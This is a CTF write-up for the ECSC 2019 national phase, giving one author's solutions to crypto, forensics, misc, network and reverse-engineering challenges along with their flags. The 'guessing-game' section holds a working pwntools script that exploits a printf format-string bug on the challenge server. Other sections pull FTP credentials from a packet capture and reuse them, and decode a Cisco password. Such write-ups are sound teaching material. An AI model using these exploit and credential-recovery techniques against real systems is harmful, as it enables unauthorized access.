# ECSC 2019 - National phase
Author: Dragomir Ioan - ioandr@gomir.pw - 1284

## Crypto Luck (150pts): Crypto
### Proof of flag

ECSC{bab4d1bdea5baf2a5ce69c2fd7e4945edd39970bc0eb49ea390d58a7d24c3986}

### Summary

SHA1 prefix proof-of-work

### Proof of Solving

The server sends 10 proof of work challenges that consist in finding a string
whose sha1 hexdigest starts with a given 6 hex digit string.

```py
import hashlib
from pwn import *

r = remote("37.128.230.46", 50041)
context.log_level = 'debug'

for round in range(10):
    prefix = r.recvline().strip()
    print "prefix:", repr(prefix)
    for i in xrange(256*256*256*256):
        s = str(i)
        if hashlib.sha1(s).hexdigest()[:6] == prefix:
            print "FOUND: ", s, hashlib.sha1(s).hexdigest()[:6]
            r.sendline(s)
            break

print r.recvall(timeout=3)
```

## Alice (300pts): Crypto
### Proof of flag

ECSC{dc0eb76143e50fe3dbeb6383605de5ffa9fefe455caca597677eab7cbf0ad649}

### Summary

Simple pattern matching I guess. Take the chars that only appear once in the
first half and the ones that don't appear at all in the second.

### Proof of Solving

The problem consists in finding a 64 hex digit string (which is a SHA256 hash
but that is irrelevant). We are given 16 versions of the hash modified following
these steps:
1. Pick 2 positions in the first half of the hash
2. Change all characters in the hash other than the ones in the picked positions

And told that the initial hash is recoverable using only the 16 hashes.

First half:

Therefore, each of the first 32 positions must have been picked only once, as
not picking one means not getting any information for that position and picking
one more than once leads to there not being enough queries to pick all
positions.

Using this information we can determine that the character on position i will
only appear on that position unchanged in ONE and only one modified hash, so
we just look for the character that appears once.

Second half:

As none of the positions in the second half were kept unchanged, all the digits
we encounter are changed. We can figure out the i-th digit by finding the one
hex digit that isn't in any of the hashes on position i.

```py
hashes = [
"f14fd2705fa37ce36ab73472883cf329917c50eb06d2080f863fd6bf712377b1",
"ad3b393e6426aef4db1a49180797393a3cb6a7516d1b5f69a3d36138d9be121c",
"73c370746eb072da5deb8ce13febaa16d33dc714c24a8424018a8a16f46cbdcf",
"05bac2205f124251c03863a608322b5486c2ba8c1fe0fbaccb1942ed838deb30",
"312f3b3ef4ce5ef837b1c9837ba8f9ba6f6f21f73eff19ea39e105a1604c61fe",
"983bd1838b16b697c90731e7602c1a1ce44f4c62032a32f2dfaa50f638f14925",
"7ec14b2e54a24a7150f121468b5dabb47dd3eb0fbb13ea33b8f7dc171d9fc8ed",
"313f4b83fbbe56da3a34c0e13fa2e55cf5e5592344c4297b122899629e5290d3",
"98b1c1348423aa782838204775281aff2e5432782539d3832aa2142b0ca92a34",
"dc2bc85fa5302c51e919bb59d6eb27dc2a0004b9d867b7505e6528435a16a58a",
"fe0e584025c1816621aa3c745971c9d9c299733e897d51d6f54cb79ac3770f08",
"7561b7a5a2348c8bed05b7c9f6e4332718188dc8e0919d1e90bdced42be58476",
"adc3d4612bd6215627a94b58579ba789003a6faa97566c257d56fdc9a2603290",
"012f795543d1be84f81584c23b3123365187d52d7abe46cd44c073558534fe62",
"734ac4a39ee5bc9b6d044c19d9e7c386b7a198d6f188ce48ef04ed0e47d8f35b",
"3563504f92d40f67f1f8c7a4f57437274b2b1690ad0570b11c9b3f80e6cb5ca7"]

hash = ['?'] * 64

for i in range(0, 32):
    d = []
    for c in '0123456789abcdef':
        d.append(0)
        for h in hashes:
            d[-1] += h[i].count(c)
    # use the digit that only appeared ONCE
    hash[i] = '0123456789abcdef'[d.index(1)]
    print i,'\t', d

for i in range(32, 64):
    c = '0123456789abcdef'
    for h in hashes:
        c = c.replace(h[i], '')
    # use the digit that did not appear at all
    assert(len(c) == 1)
    hash[i] = c


print ''.join(hash)
```

## Online encryption (100pts): Forensics
### Proof of flag

ECSC{dd545fbf12fd608daa8c201f50f95c8520bec9f744a3573b1dc0bc53ce019726}

### Summary

HTTP traffic reveals the user sending the flag in plaintext to an online
encryption service.

### Proof of Solving

The pcap contains some requests to
http://txtwizard.net/crypto/AES/encrypt/CBC/PKCS5 . Their query strings have a
parameter `plainText` and some other AES parameters but we only have to look at
the `plainText` of each request:

```
plainText=you+got+the+ideea
plainText=you+got+the+ideea
plainText=you+got+the+ideea
plainText=UlBGUHtxcTU0NX
plainText=NvczEyc3E2MDhx
plainText=bm44cDIwMXM1MH
plainText=M5NXA4NTIwb3Jw
plainText=OXM3NDRuMzU3M2
plainText=8xcXAwb3A1M3By
plainText=MDE5NzI2fQ%3D%3D
plainText=he+he+he+%3A)
plainText=UlBGUHtxcTU0NXNvc
plainText=zEyc3E2MDhxbm44cD
plainText=IwMXM1MHM5NXA4NTI
plainText=wb3JwOXM3NDRuMzU3
plainText=M28xcXAwb3A1M3ByM%0ADE5NzI2fQ%3D%3D
```

Decoding the base64 string that was split among the multiple requests gives:

`RPFP{qq545sos12sq608qnn8p201s50s95p8520orp9s744n3573o1qp0op53pr019726}`

Which is the flag, but caesar-shifted. Shifting it back with key 13 leads to:

`ECSC{dd545fbf12fd608daa8c201f50f95c8520bec9f744a3573b1dc0bc53ce019726}`


## Piet Mondrian (100pts): Misc
### Proof of flag

ECSC{e647c19e4fc7838bf764abbdcb0c1f08adca163cdadfb889bee5201fc4397e5d}

### Summary

3 piet programs (PNG files) are embedded in the downloaded JPEG. They print
parts of the flag.

### Proof of Solving

The name hints to the piet programming language, but that only accepts PNG or
other bitmap formats, whereas the downloaded image is a JPEG. Looking inside the
file we can notice 3 PNG files concatenated to the end of the JPEG. We can 
extract them:

```
$ dd if=~/Downloads/piet.jpg bs=1 of=p1.png skip=345743
$ dd if=~/Downloads/piet.jpg bs=1 of=p2.png skip=1020129
$ dd if=~/Downloads/piet.jpg bs=1 of=p3.png skip=1761760
```

And feed them to a piet interpreter:

```
$ npiet p1.png | head -c 23
ECSC{e647c19e4fc7838bf7
$ npiet p2.png | head -c 23
64abbdcb0c1f08adca163cd
$ npiet p3.png | head -c 24
adfb889bee5201fc4397e5d}
```

That gives us the flag split into 3 parts.

## Secure code (150pts): Misc
### Proof of flag

ECSC{42282402f27bf83651777475104cf121e737b79b682d7405880adf8447ef22ba}

### Summary

Morse code + caesar cipher on a custom alphabet + LSB "steganography" on a bunch
of loops inside a binary.

### Proof of Solving

Opening the binary in a decompiler such as ghidra and letting it decompile for
a few minutes (the main function is HUGE) leads us to find this main() general
structure:

```c++
char alphabet[] = "abcdefghijklmnopqrstuvwxyz1234567890 ";
std::string morse[] = [
    ". -",
    "- . . .",
    "- . - .",
    //... more morse code for each of the alphabet chars
    ];
for(int i=0; i<=11; i++) {
    rotate_left_once(alphabet);
    rotate_left_once(alphabet);
    rotate_left_once(alphabet);
}
for(int i=0; i<=10; i++) {
    rotate_left_once(alphabet);
    rotate_left_once(alphabet);
    rotate_left_once(alphabet);
}
// ...
// Many many many similar loops
// ...
for(int i=0; i<=11; i++) {
    rotate_left_once(alphabet);
    rotate_left_once(alphabet);
    rotate_left_once(alphabet);
}

std::string input;
std::cin >> input;

// loop through input and write morse[alphabet.index(input[i])]
// ...
```

So the encoding scheme pretty much just does a caesar-like shift using the
custom alphabet and then converts that to morse code.

The task description looks like morse but there's only one space between the
dits and dahs, but that's a browser rendering "feature". To see all the spaces
we can view the page source:

...-- -.- .-. .-. ..-. .--- ..- - -.- ..-. -. ..- ...-- ..-. --. .... ..- .---- --.. ..-. .... --- - --. -..- ..... ..-. -.-- --.. -.- -- --. - ..- ..-. -.-. --... -.-. --... -.-. --... -.- .

Decoding the morse code and then caesar shifting with the custom alphabet leads
us to the actual task description:

![cryptii: ...-- -> morse -> caesar -> well done](./secure-cryptii.png)

`well done how about binary stegano 818181e0`

Seeing as steganography was mentioned, I looked again at the main() function and
saw that all the for loops either had 11 or 12 iterations. Thinking of LSB
steganography, we can interpret the 11-loops as a 1 bit and the 12-loops as a 0
bit to get the following bitstring:

```
01000101010000110101001101000011011110110011010000110010001100100011100000110010
00110100001100000011001001100110001100100011011101100010011001100011100000110011
00110110001101010011000100110111001101110011011100110100001101110011010100110001
00110000001101000110001101100110001100010011001000110001011001010011011100110011
00110111011000100011011100111001011000100011011000111000001100100110010000110111
00110100001100000011010100111000001110000011000001100001011001000110011000111000
00110100001101000011011101100101011001100011001000110010011000100110000101111101
```

![cryptii 010001 -> binary -> ECSC](./secure-flag.png)

Decoding that as a binary ASCII string gives us the flag:
ECSC{42282402f27bf83651777475104cf121e737b79b682d7405880adf8447ef22ba}

## solfa sol fa sol (200pts): Misc
### Proof of flag

ECSCHELLOWORLDLETSROCKATTHEFINALSECSC

### Summary

solfa cipher

### Proof of Solving

Initially I was not aware of the encoding scheme, but I noticed a few things.
The second and fourth notes are the same, and the first 4 notes are the same as
the last 4. In between the first group of 4 and the last one there are 29 other
notes. This looked a lot like the ECSC+29 chars+ECSC flag format, so I initially
thought it was some sort of a substitution cipher.

Using the playlist:
https://www.youtube.com/playlist?list=PL4vyWz4g-OOGH2bDftOeBX1gfdDtCpPEu

I matched the notes, which were gdfdegaabgbcagagcfcbdceccegcdaeafgdfd. Solving
it like a cryptogram didn't work so I was stuck here for a while.

Then the hint came and by looking up the challenge title we find info about the
"solfa cipher", which uses both pitch and timing to encode letters.

The solfa cipher counts note times in fours (1-2-3-4-1-2-3-4-1-...), so in
Audacity I added a rhythm track and counted the beats to augment the data I had
figured out earlier:

![solfa timings](./solfa-timing.png)

The final solfa ciphertext is S1 R3 F1 R3 M3 S1 L3 L3 T1 S4 T1 D3 L3 S3 L3 S1 D1
F1 D3 T1 R3 D2 M1 D1 D1 M3 S1 D4 R1 L1 M1 L3 F1 S1 R3 F1 R3, and decoding it
using https://www.wmich.edu/mus-theo/solfa-cipher/secrets/ leads us to the flag:

ECSCHELLOWORLDLETSROCKATTHEFINALSECSC

## victim (100pts): Network
### Proof of flag

ECSC{AC0DFD65CA16813A6AD68C4BA55F8C607496D93E2408EE0B5EF6F1B9ACCE0BC9}

### Summary

Victim uses the same password in an unencrypted ftp login as well as to protect
an archive that is later downloaded using ftp.

### Proof of Solving

The packet capture contains a bunch of FTP traffic to various servers. We can
get the credentials that were used:

```
$ tshark -r files/victim.pcap 'ftp.request.command == "PASS" || ftp.request.command == "USER"'
 1829  40.557887   10.11.7.25 → 90.130.70.73 FTP 70  Request: USER anonymous
 1833  40.631343   10.11.7.25 → 90.130.70.73 FTP 80  Request: PASS mozilla@example.com
 2708  95.295660   10.11.7.25 → 146.66.113.185 FTP 70  Request: USER anonymous
 2712  95.447033   10.11.7.25 → 146.66.113.185 FTP 80  Request: PASS mozilla@example.com
 2743 112.288223   10.11.7.25 → 146.66.113.185 FTP 80  Request: USER dlpuser@dlptest.com
 2747 112.438904   10.11.7.25 → 146.66.113.185 FTP 86  Request: PASS VADPRDqid4TaB0r5a2B0n9wLp
 4985 202.362546   10.11.7.25 → 195.144.107.198 FTP 70  Request: USER anonymous
 4992 202.404052   10.11.7.25 → 195.144.107.198 FTP 80  Request: PASS mozilla@example.com
 5236 213.044444   10.11.7.25 → 195.144.107.198 FTP 65  Request: USER demo
 5242 213.084183   10.11.7.25 → 195.144.107.198 FTP 69  Request: PASS password
```

Later on the user downloads some files, including a zip archive (tcp stream 42)
that has a file named Flag.txt. We could've directly found the archive by
searching for packets containing the word "flag".

Let's try to extract Flag.txt:

```
$ tshark -r files/victim.pcap -Tfields -e data 'tcp.stream == 42' | xxd -r -p > victim-archive.zip
$ 7z x victim-archive.zip 

7-Zip [64] 9.20  Copyright (c) 1999-2010 Igor Pavlov  2010-11-18
p7zip Version 9.20 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,12 CPUs)

Processing archive: victim-archive.zip

Extracting  Flag.txt
Enter password (will not be echoed) :
```

The Flag.txt file inside the archive is password protected, but we can guess the
user might be reusing passwords. Trying the FTP password we saw earlier
successfully decrypts the file:

```
$ 7z x victim-archive.zip -P'VADPRDqid4TaB0r5a2B0n9wLp'
$ cat Flag.txt
ECSC{AC0DFD65CA16813A6AD68C4BA55F8C607496D93E2408EE0B5EF6F1B9ACCE0BC9}
```

## Unusual Communication (200pts): Network
### Proof of flag

ECSC{5d0d4436ad7e07d5375948ad13746fe2987aa7fd7126dfdd47acedf89905a0a4}

### Summary

Credential screenshot leaked as a PNG image through ICMP ping packet payloads.
Password is a CISCO type 9 password, which is easily decryptable.

### Proof of Solving

Taking a look at the pcap, we see a bunch of HTTP traffic that downloads an ELF
executable `ncat` split in 10 parts (c1.html - c10.html) and its man page
(b1.html - b10.html). This doesn't have any relevant information, though. What
we need to look at are the ICMP pings. Looking at the first one's payload we can
see the start of a PNG file:

```
$ tshark -r ~/Downloads/captura.pcapng -Y icmp -Tfields -e data | head -n 1 | xxd -r -p | xxd
00000000: 8950 4e47 0d0a 1a0a 0000 000d 4948 4452  .PNG........IHDR
00000010: 0000 0745 0000 0045 0806 0000 0035 b63e  ...E...E.....5.>
00000020: aa00 0000 0473 4249 5408 0808 087c 0864  .....sBIT....|.d
00000030: 8800 0000 1974 4558                      .....tEX
```

By concatenating all the ping payloads we get this image:

![text below](./unusual.png)

with the text

```
!
username admin password 7 03217838251474481E0D4D5144440A08532F7B732C666675465E425B0052080B040058051D44000000525302520F0C57550E53021702500C0A050A254A1650405542135B0D5037
!
```

After a bit of recon we find that the password is a Cisco Type 7 password.
There are many online tools for decrypting them. I used
http://www.ifm.net.nz/cookbooks/passwordcracker.html to get the flag:

ECSC{5d0d4436ad7e07d5375948ad13746fe2987aa7fd7126dfdd47acedf89905a0a4}


## global-cell (300pts): Network
### Proof of flag

ECSC{50fb4a9bee63b51141c2b32e42251d1f88104731d1a7b73ff9750626227d7f5a}

### Summary

Automated scanner submits cell tower identification data in a POST request.

### Proof of Solving

The downloaded packet capture looked like some sort of scanner saving mobile
network data to multiple databases (mysql queries, redis queries and an HTTP
API). Details which sparked my interest were the IMSI number 8765434567 and
MSISDN range 333456789011111-333456789011222, but these were of no use.

The information that leaked a location was the scanner logging cell tower
information:

```
$ tshark -Y 'frame contains "cell_id"' -r files/global-cell.pcapng -Tfields -e data | xxd -r -p | grep cell_id

...
{'INFO_CELL_GLOBAL_ID': {'sector': 2, 'cell_id': 1106, 'cell_gid': u'208f2075ee4025', 'bts': 69, 'mcc': 208, 'lac': 22510, 'mnc': 20}}
...
```

We can now look up the cell tower on a service like
https://cellidfinder.com/cells

![Cell tower lookup screenshot](./global-cell-lookup.png)

The cell tower coordinates are (44.701801, -1.032297) which are located in the
town Lanton, whose area code is 33229.

The flag is ECSC{sha256("33229")}

## get-password (100pts): Revexp
### Proof of flag

ECSC{DAC553500B60BF700F56E456922104FA06BC144213ED2B58BEC2429F015242DB}

### Summary

Flag is stored as a character matrix / string literal array that is read from
top to bottom, left to right.

### Proof of Solving

The executable contains a password validation function, which when decompiled
(and we need to set the correct variable types such as `rows` being a
`char*[21]`) looks like this:

```c++
ulong _check_pw(char *input)

{
  int i;
  uint not_ok;
  char *rows [21];
  
  _memcpy(rows,password_matrix,0xa0,0xa0);
  not_ok = 0;
  for(i=0; i<=0x5f; i++){
    if (rows[i % 20][2 * (i / 10)] - input[i] != 1) {
      not_ok = 1;
      break;
    }
  }
  return not_ok;
}
```

This basically checks if the password matches the characters in a 20 line 18
column matrix read from top-to-bottom left-to-right.

That matrix is:
```
SfBsOxPvNMDyNAhRSgsG
VjYOkGDgkkXgULZUkCeh
OYgUClVWJQAvOtMfBSPg
UgGADoBNyIpiGNyfyuet
RoSgSYiwNwAcSgnPOsMB
4sGvkBZfEqfHEgvkUeUL
ullIdbFSSDZrKCSAJIUz
FPVZxzrNHXShDeRb1GXd
RNpVNeyZRVHTOwZuNdQq
VALsFVveUNPuUoDWlpXu
VyNbOyZjyGBwQUiUxeSe
xO2rYv2pXL3UWoDvBTDQ
qCOaRDOZicRnhDSacIgc
bGUTstlyoElXoIVVghRO
MmNRiDVggENtBjNHvw>g
MC2BCa1DjAyglyzgwQ>v
LeNdcAOGPROrjrOUSiWC
YQEvXfUjbEERJDEjLZcS
baCAeWZGrnROqkJKchEi
oLDKgG6TxDzrQu6amIlZ
```

We can reverse this with this python script:

```py
ct = ["SfBsOxPvNMDyNAhRSgsG",
"VjYOkGDgkkXgULZUkCeh",
"OYgUClVWJQAvOtMfBSPg",
"UgGADoBNyIpiGNyfyuet",
"RoSgSYiwNwAcSgnPOsMB",
"4sGvkBZfEqfHEgvkUeUL",
"ullIdbFSSDZrKCSAJIUz",
"FPVZxzrNHXShDeRb1GXd",
"RNpVNeyZRVHTOwZuNdQq",
"VALsFVveUNPuUoDWlpXu",
"VyNbOyZjyGBwQUiUxeSe",
"xO2rYv2pXL3UWoDvBTDQ",
"qCOaRDOZicRnhDSacIgc",
"bGUTstlyoElXoIVVghRO",
"MmNRiDVggENtBjNHvw>g",
"MC2BCa1DjAyglyzgwQ>v",
"LeNdcAOGPROrjrOUSiWC",
"YQEvXfUjbEERJDEjLZcS",
"baCAeWZGrnROqkJKchEi",
"oLDKgG6TxDzrQu6amIlZ"]
pt = ['?'] * 95

for i in range(95):
    print i
    c = ct[i%20][2 * (i//10)]
    print c, hex(ord(c))
    pt[i] = chr(ord(c) - 1)

print ''.join(pt)
```

Which outputs the base64 string
`RUNTQ3tEQUM1NTM1MDBCNjBCRjcwMEY1NkU0NTY5MjIxMDRGQTA2QkMxNDQyMTNFRDJCNThCRUMyNDI5RjAxNTI0MkRCfQ=`

which decodes to the flag:
ECSC{DAC553500B60BF700F56E456922104FA06BC144213ED2B58BEC2429F015242DB}


## guessing-game (100pts): Revexp
### Proof of flag

ECSC{9120848337A9760DDAE532BAF3D7D8E7032DFFFE6DD3B323A5F5CA0455B9C79C}

### Summary

Using a user-controlled format string to leak local variables from the stack.

### Proof of Solving

The server asks for a name and echoes it back. We can notice that by sending
printf format sequences such as `%x` we get back a hex number which is the
topmost value on the stack.

This is a classic printf format string vulnerability.

We can use this to retrieve multiple values from the stack, including the 3
random numbers whose sum we must guess.

Using `%8$p` and `%9$p` we can get the 8th and respectively 9th value from the
top of the stack. This script does that, parses the response and sends back
their sum:

```py
from pwn import *

#r = process("./guessing-game")
r = remote("37.128.230.46", 50021)

r.sendline(";%8$p;%9$p;")
r.recvuntil(";")
n1 = int(r.recvuntil(";")[:-9], 16)
n2n3 = int(r.recvuntil(";")[:-1], 16)

n2 = (n2n3 & 0xffffffff00000000) >> 32
n3 = n2n3 & 0x00000000ffffffff

r.sendline(str(n1 + n2 + n3))

print r.recvall()
```

## Checker (150pts): Revexp
### Proof of flag

ECSC{79e17ba7189bc35bcaca6b8bcc263f8a7ed672ada400be4394fa7aad74e3af08}

### Summary

Python elf executable contants can be extracted using pyi-archive_viewer and the
code objects are then easily decompiled, revealing a simple validation script.

### Proof of Solving

The downloaded file is a python executable made with pyinstaller. This consists
of a whole lot of cpython code (i.e. what you'd get when downloading python so
that it works even on computers without python) and an archive containing the
files relevant to the program execution, such as the program itself and
the libraries it uses.

#### Extract compiled file

Using `pyi-archive_viewer` we can take a look at this archive and extract any
files we might want. Here's a part of the list of the files:

```
$ pyi-archive_viewer files/checker
 pos, length, uncompressed, iscompressed, type, name
[(0, 245, 312, 1, 'm', u'struct'),
 (245, 1102, 1809, 1, 'm', u'pyimod01_os_path'),
 (1347, 4354, 9369, 1, 'm', u'pyimod02_archive'),
 (5701, 7374, 18674, 1, 'm', u'pyimod03_importers'),
 (13075, 1848, 4157, 1, 's', u'pyiboot01_bootstrap'),
 (14923, 3015, 5662, 1, 's', u'1'),
 (17938, 8205, 22040, 1, 'b', u'_bz2.cpython-36m-x86_64-linux-gnu.so'),

...

 (3941484, 232193, 581408, 1, 'b', u'libssl.so.1.1'),
 (4173677, 64264, 170784, 1, 'b', u'libtinfo.so.5'),
 (4237941, 60099, 116960, 1, 'b', u'libz.so.1'),
 (4298040, 11462, 31752, 1, 'b', u'readline.cpython-36m-x86_64-linux-gnu.so'),
 (4309502, 4688, 15368, 1, 'b', u'resource.cpython-36m-x86_64-linux-gnu.so'),
 (4314190, 8307, 24968, 1, 'b', u'termios.cpython-36m-x86_64-linux-gnu.so'),
 (4322497, 209143, 771132, 1, 'x', u'base_library.zip'),
 (4531640, 1139289, 1139289, 0, 'z', u'PYZ-00.pyz')]
```

What got me stuck was that I was looking at `PYZ-00.pyz` but that only contains
other libraries. The relevant file was the one named `1`. Its simple name is
probably why I missed it lol.

We can extract that:

```
? X
extract name? 1
to filename? checker-1-extracted
```

Taking a look inside we can see strings such as `print`, `username`, `rot13`, 
etc. which mean that the file isn't encrypted or compressed any further and that
it's probably a serialized python code object.

It is crucial that from now on we use the same version of python that the
challenge was made for as things like the marshal format differs from version
to version.

#### Convert to pyc

We would like to convert it to a pyc file as then we would be able to use
`uncompyle` to get readable python out of it.

The structure of a pyc file is quite simple, as it starts with a magic number
and a timestamp followed by the serialized code object of the module itself.
And we have the last part in the `checker-1-extracted` file, we just need to
prepend the correct magic number and any timestamp:

```py
#!/usr/bin/env python3.6

code_obj = open("checker-1-extracted", "rb").read()

with open("checker-1-extracted.pyc", "wb") as f:
    f.write(imp.get_magic())    # write the python 3.6 magic number
    f.write(b"AAAABBBB")        # irrelevant timestamp whatever
    f.write(code_obj)

```

#### Uncompyle and get username and password

Now that we have a functioning pyc file we can pass it to uncompyle to get
readable python code:

```py
#$ unompyle6 checker-1-extracted.pyc

# ... a whole bunch of function definitions ...

username = decode(decode(decode(rot13(('').join(map(str, username))))))
password = md5_to_hex(md5(str.encode(decode(decode(rot13(unquote(decode(('').join(map(str, password))))))))))
print('Welcome to our checker software.')
print('We need to verify your identity in order to reveal the flag.')
test_username = input('Enter username:')
if test_username == username:
    test_password = input('Enter password:')
    if password == test_password:
        print('Well done the flag is: ECSC{sha256(username:password)}')
    else:
        print('I do not know you!')
else:
    print('I do not know you!')
# okay decompiling checker-1-extracted.pyc
```

It is irrelevant what the `decode` and `rot13` functions do as we can just
add a `print(username, password)` statement after the correct username and
password are decoded. Running the modified script prints:

```
$ python3 checker-1-extracted.py
ECSC-Admin be8d1435876930d45073cad33273ade7
```

And we can feed that to the script to get the flag format:

```
Welcome to our checker software.
We need to verify your identity in order to reveal the flag.
Enter username:ECSC-Admin
Enter password:be8d1435876930d45073cad33273ade7
Well done the flag is: ECSC{sha256(username:password)}
```

The flag is ECSC{sha256("ECSC-Admin:be8d1435876930d45073cad33273ade7")}
or ECSC{79e17ba7189bc35bcaca6b8bcc263f8a7ed672ada400be4394fa7aad74e3af08}
